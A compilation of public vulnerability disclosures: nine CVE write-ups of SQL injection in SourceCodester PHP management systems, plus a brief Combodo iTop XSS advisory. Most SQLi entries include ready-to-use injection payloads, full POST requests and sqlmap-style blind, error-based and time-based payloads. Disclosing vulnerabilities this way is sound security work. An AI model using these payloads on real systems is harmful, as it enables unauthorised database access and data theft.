Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item.

Permalink

Cannot retrieve contributors at this time

**Purchase-order-management-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html

Vulnerability File: \\purchase\_order\\classes\\Master.php?f=delete\_item

Vulnerability location: /purchase\_order/classes/Master.php?f=delete\_item, id

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

POST /purchase\_order/classes/Master.php?f\=delete\_item HTTP/1.1
Host: 192.168.1.19
Content\-Length: 65
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/purchase\_order/admin/?page=items
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sils4jibq9sp4e2n7i4joq8to7
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-28022: bug_report/SQLi-1.md at main · k0xx11/bug_report

Home Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via /hocms/classes/Master.php?f=delete_member.

Permalink

Cannot retrieve contributors at this time

**Home Owners Collection Management System has SQL injection vulnerability**

vendor : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html

Vulnerability file: /hocms/classes/Master.php?f=delete\_member

Vulnerability location: /hocms/classes/Master.php?f=delete\_member,id

\[+\]Payload: id=2' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point

    POST /hocms/classes/Master.php?f=delete_member HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 64
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/hocms/admin/?page=members
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=vfe306mj2a11p5q94440ttg4bd
    Connection: close
    
    id=2' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=2' RLIKE (SELECT (CASE WHEN (9537=9537) THEN 2 ELSE 0x28 END))-- lLzj
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=2' AND (SELECT 2052 FROM(SELECT COUNT(\*),CONCAT(0x7162716b71,(SELECT (ELT(2052\=2052,1))),0x717a627a71,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- kJBi

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=2' AND (SELECT 8581 FROM (SELECT(SLEEP(5)))WkHC)-- dgcN
\---

CVE-2022-28414: bug_report/SQLi-1.md at main · k0xx11/bug_report

Simple Real Estate Portal System v1.0 was discovered to contain a SQL injection vulnerability via /reps/classes/Users.php?f=delete_agent.

Permalink

Cannot retrieve contributors at this time

**Simple Real Estate Portal System v1.0 has a SQL injection vulnerability**

vendors: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html

Vulnerability file: /reps/classes/Users.php?f=delete\_agent

Vulnerability location: /reps/classes/Users.php?f=delete\_agent , id

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point

    POST /reps/classes/Users.php?f=delete_agent HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 65
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/reps/admin/?page=agents
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=b7n0d4rju88m3p50kmalnvn6ti
    Connection: close
    
    id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=1' RLIKE (SELECT (CASE WHEN (7043=7043) THEN 1 ELSE 0x28 END))-- nmnX
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8027 FROM(SELECT COUNT(\*),CONCAT(0x7171717871,(SELECT (ELT(8027\=8027,1))),0x716a6b6271,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- WTeh

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=1' AND (SELECT 9988 FROM (SELECT(SLEEP(5)))oDDv)-- XFnj
\---

CVE-2022-28410: bug_report/SQLi-4.md at main · k0xx11/bug_report

Car Driving School Management System v1.0 was discovered to contain a SQL injection vulnerability via /cdsms/classes/Master.php?f=delete_enrollment.

Permalink

Cannot retrieve contributors at this time

**Car driving school management system has a SQL injection vulnerability.**

vendors: https://www.sourcecodester.com/php/15070/car-driving-school-management-system-phpoop-free-source-code.html

Vulnerability file: /cdsms/classes/Master.php?f=delete\_enrollment

Vulnerability location: /cdsms/classes/Master.php?f=delete\_enrollment, id

\[+\]Payload: id=5' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point

    POST /cdsms/classes/Master.php?f=delete_enrollment HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 64
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/cdsms/admin/?page=enrollees
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=vfe306mj2a11p5q94440ttg4bd
    Connection: close
    
    id=5' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=5' RLIKE (SELECT (CASE WHEN (2063=2063) THEN 5 ELSE 0x28 END))-- tmvi
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=5' AND EXTRACTVALUE(3533,CONCAT(0x5c,0x71767a6b71,(SELECT (ELT(3533\=3533,1))),0x716a6b7871))\-- tQbt

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=5' AND (SELECT 1981 FROM (SELECT(SLEEP(5)))mXOm)-- Mmee
\---

CVE-2022-28413: bug_report/SQLi-2.md at main · k0xx11/bug_report

Car Driving School Managment System v1.0 was discovered to contain a SQL injection vulnerability via /cdsms/classes/Master.php?f=delete_package.

Permalink

Cannot retrieve contributors at this time

**Car driving school management system has a SQL injection vulnerability.**

vendors: https://www.sourcecodester.com/php/15070/car-driving-school-management-system-phpoop-free-source-code.html

Vulnerability file: /cdsms/classes/Master.php?f=delete\_package

Vulnerability location: /cdsms/classes/Master.php?f=delete\_package ,id

\[+\]Payload: id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point

    POST /cdsms/classes/Master.php?f=delete_package HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 64
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/cdsms/admin/?page=packages
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=vfe306mj2a11p5q94440ttg4bd
    Connection: close
    
    id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=1' RLIKE (SELECT (CASE WHEN (1015=1015) THEN 1 ELSE 0x28 END))-- lYIO
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=1' AND EXTRACTVALUE(9451,CONCAT(0x5c,0x716a6a7071,(SELECT (ELT(9451\=9451,1))),0x716b706b71))\-- FYNY

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=1' AND (SELECT 2853 FROM (SELECT(SLEEP(5)))ZgVu)-- duUy
\---

CVE-2022-28412: bug_report/SQLi-1.md at main · k0xx11/bug_report

Simple Real Estate Portal System v1.0 was discovered to contain a SQL injection vulnerability via /reps/classes/Master.php?f=delete_estate.

Permalink

Cannot retrieve contributors at this time

**Simple Real Estate Portal System v1.0 has a SQL injection vulnerability**

vendors: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html

Vulnerability file: /reps/classes/Master.php?f=delete\_estate

Vulnerability location: /reps/classes/Master.php?f=delete\_estate , id

\[+\] Payload: id=7' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point

    POST /reps/classes/Master.php?f=delete_estate HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 65
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/reps/admin/?page=amenities
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=b7n0d4rju88m3p50kmalnvn6ti
    Connection: close
    
    id=7' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=7' RLIKE (SELECT (CASE WHEN (9646=9646) THEN 7 ELSE 0x28 END))-- qdhX
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=7' AND EXTRACTVALUE(8654,CONCAT(0x5c,0x7162767a71,(SELECT (ELT(8654\=8654,1))),0x71717a7871))\-- JBQn

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=7' AND (SELECT 1732 FROM (SELECT(SLEEP(5)))VLjc)-- LToO
\---

CVE-2022-28030: bug_report/SQLi-3.md at main · k0xx11/bug_report

Simple Real Estate Portal System v1.0 was discovered to contain a SQL injection vulnerability via /reps/classes/Master.php?f=delete_type.

Permalink

**Simple Real Estate Portal System v1.0 has a SQL injection vulnerability**

vendors: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html

Vulnerability file: /reps/classes/Master.php?f=delete\_type

Vulnerability location: /reps/classes/Master.php?f=delete\_type , id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point

    POST /reps/classes/Master.php?f=delete_type HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 65
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/reps/admin/?page=types
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=b7n0d4rju88m3p50kmalnvn6ti
    Connection: close
    
    id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=2' RLIKE (SELECT (CASE WHEN (7750=7750) THEN 2 ELSE 0x28 END))-- wAyE
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=2' AND (SELECT 5093 FROM(SELECT COUNT(\*),CONCAT(0x716a7a6271,(SELECT (ELT(5093\=5093,1))),0x71706b7671,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- vBmh

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=2' AND (SELECT 4716 FROM (SELECT(SLEEP(5)))NHrz)-- bhFd
\---

CVE-2022-28029: bug_report/SQLi-2.md at main · k0xx11/bug_report

Simple Real Estate Portal System v1.0 was discovered to contain a SQL injection vulnerability via /reps/classes/Master.php?f=delete_amenity.

Permalink

Cannot retrieve contributors at this time

**Simple Real Estate Portal System v1.0 has a SQL injection vulnerability**

vendors: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html

Vulnerability file: /reps/classes/Master.php?f=delete\_amenity

Vulnerability location: /reps/classes/Master.php?f=delete\_amenity , id

\[+\] Payload: id=7' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point

    POST /reps/classes/Master.php?f=delete_amenity HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 65
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/reps/admin/?page=amenities
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=b7n0d4rju88m3p50kmalnvn6ti
    Connection: close
    
    id=7' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=7' RLIKE (SELECT (CASE WHEN (8101=8101) THEN 7 ELSE 0x28 END))-- gXyQ
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=7' AND (SELECT 6381 FROM(SELECT COUNT(\*),CONCAT(0x7170787a71,(SELECT (ELT(6381\=6381,1))),0x716b6a6b71,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- LaZi

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=7' AND (SELECT 2258 FROM (SELECT(SLEEP(5)))pvPg)-- dMCC
\---

CVE-2022-28028: bug_report/SQLi-1.md at main · k0xx11/bug_report

Home Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via /hocms/classes/Master.php?f=delete_phase.

Permalink

Cannot retrieve contributors at this time

**Home Owners Collection Management System has SQL injection vulnerability**

vendor : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html

Vulnerability file: /hocms/classes/Master.php?f=delete\_phase

Vulnerability location: /hocms/classes/Master.php?f=delete\_phase,id

\[+\]Payload: id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point

    POST /hocms/classes/Master.php?f=delete_phase HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 64
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/hocms/admin/?page=phases
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=vfe306mj2a11p5q94440ttg4bd
    Connection: close
    
    id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=1' RLIKE (SELECT (CASE WHEN (3093=3093) THEN 1 ELSE 0x28 END))-- TVaW
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9655 FROM(SELECT COUNT(\*),CONCAT(0x716a787a71,(SELECT (ELT(9655\=9655,1))),0x71786a7071,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- rFkx

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=1' AND (SELECT 5645 FROM (SELECT(SLEEP(5)))IsZT)-- rkXc
\---

CVE-2022-28417: bug_report/SQLi-4.md at main · k0xx11/bug_report

Combodo iTop is a web based IT Service Management tool. In versions prior to 3.0.0-beta6 the export CSV page don't properly escape the user supplied parameters, allowing for javascript injection into rendered csv files. Users are advised to upgrade. There are no known workarounds for this issue.

**XSS in csvimport in 3.0.0-beta versions**

**Affected versions**

3.0.0-beta\*

**Patched versions**

\>=3.0.0-beta6

**Description**

**Impact**

The export CSV page don't properly escape the passed parameters, allowing XSS.

**Patches**

Fixed in 3.0.0 (october 2021)

**References**

Combodo ref N°4361

**Credits**

Redshell (https://github.com/RedShellSec)

**For more information**

If you have any questions or comments about this advisory:  
Email us at itop-security@combodo.com

**CVE ID**

CVE-2021-41161

**GHSA ID**

GHSA-788f-g6g9-f8fc

Tag

#java